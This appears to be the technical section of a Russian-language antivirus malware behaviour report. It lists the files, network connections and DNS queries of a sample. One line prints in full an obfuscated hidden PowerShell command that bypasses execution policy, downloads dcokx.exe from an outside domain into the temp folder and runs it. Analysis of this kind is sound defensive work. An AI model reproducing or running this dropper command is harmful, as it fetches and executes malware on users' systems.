Техническая информация
- http://orjinalkutu.com/imager/dcokx.exe как %temp%\\dcokx.exe
- '<SYSTEM32>\cmd.exe' /c PoWErsHELL.exe -wInDoWStylE HIdDen -NOPROfilE -EXECuTIonPoliCY bYpAss (NEw-ObjECt SySTEM.NEt.WebCLIeNt).DoWNLOADFIle('http://orjinalkutu.com/imager/dcokx.exe','%TEMP%\\dcokx.exe') & %TEMP%\\...
- 'or###alkutu.com':80
- 'or###alkutu.com':443
- 'pk#.goog':80
- http://or###alkutu.com/imager/dcokx.exe
- http://pk#.goog/gsr1/gsr1.crt
- 'or###alkutu.com':443
- DNS ASK or###alkutu.com
- DNS ASK pk#.goog